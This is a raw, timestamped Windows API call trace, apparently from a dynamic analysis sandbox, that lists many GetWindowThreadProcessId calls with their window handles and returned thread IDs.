	[0603.336] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x538
	[0603.338] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0603.340] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x778
	[0604.615] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x778
	[0606.160] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0607.733] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0607.735] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0607.736] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0609.265] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0609.269] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0609.275] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0609.277] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0609.278] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x460
	[0609.280] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0610.712] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0610.715] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x3a8
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1bd0
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1bfc
	[0611.577] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1a78
	[0612.648] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b90
	[0612.852] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b04
	[0612.854] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b34
	[0612.856] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b64
	[0614.073] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1bb0
	[0618.612] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1acc
	[0618.615] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1a2c
	[0618.617] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x19a8
	[0619.319] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1944
	[0619.903] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x18c8
	[0619.908] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x18ac
	[0619.910] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x18ec
	[0619.913] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1898
	[0619.915] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc98
	[0619.916] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x153c
	[0621.432] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1808
	[0621.437] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12a4
	[0621.441] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1740
	[0621.441] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16c4
	[0622.789] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1820
	[0622.794] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16ac
	[0622.797] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1858
	[0622.801] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1664
	[0622.803] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10b4
	[0623.859] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10ac
	[0624.674] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10ec
	[0624.683] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1068
	[0624.686] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x17e0
	[0624.689] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x102c
	[0624.692] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x17a4
	[0624.694] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1050
	[0625.635] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1694
	[0625.641] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1770
	[0626.927] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1720
	[0626.933] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x165c
	[0626.937] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1578
	[0626.942] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16c0
	[0626.945] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x161c
	[0626.948] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1638
	[0626.949] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x15c8
	[0626.951] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1554
	[0626.952] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1674
	[0628.514] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1520
	[0629.497] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x14bc
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xf8c
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe9c
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1434
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x14ec
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xfcc
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12ac
	[0630.706] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1484
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x934
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc0c
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb08
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x948
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1178
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13e0
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xcd0
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13fc
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xdc8
	[0630.707] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc18
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc2c
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa1c
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1244
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xdb0
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1398
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1358
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1370
	[0630.708] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1340
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x130c
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12c0
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12e4
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1270
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1298
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x120c
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x122c
	[0630.709] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11c4
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11b0
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1188
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1148
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1160
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10fc
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe34
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xea4
	[0630.710] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x514
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe48
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xbc8
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xdf8
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x318
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xcac
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x8bc
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xf9c
	[0630.711] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xf48
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe40
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xecc
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xeb8
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe80
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe98
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe60
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xee4
	[0630.712] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xf00
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xdf0
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe1c
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xdd0
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xd94
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xd74
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xd00
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xcd8
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc84
	[0630.713] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xca4
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc64
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc24
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb84
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xbac
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x384
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xab8
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x33c
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa44
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa64
	[0630.714] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x8a8
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xaf0
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x88c
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb04
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x910
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x230
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xac0
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xab4
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xaac
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x3d0
	[0630.715] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x978
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa7c
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x59c
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa88
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa6c
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa68
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x9f8
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa04
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x924
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x8dc
	[0630.716] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x7dc
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x768
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x764
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x820
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x810
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x794
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x83c
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x7ac
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb44
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb5c
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x838
	[0630.717] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x818
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x5b8
	[0630.718] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x494
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1ec
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x440
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x7e8
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x730
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x2c8
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x31c
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x330
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x128
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x5c8
	[0630.719] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x6f8
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x358
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x73c
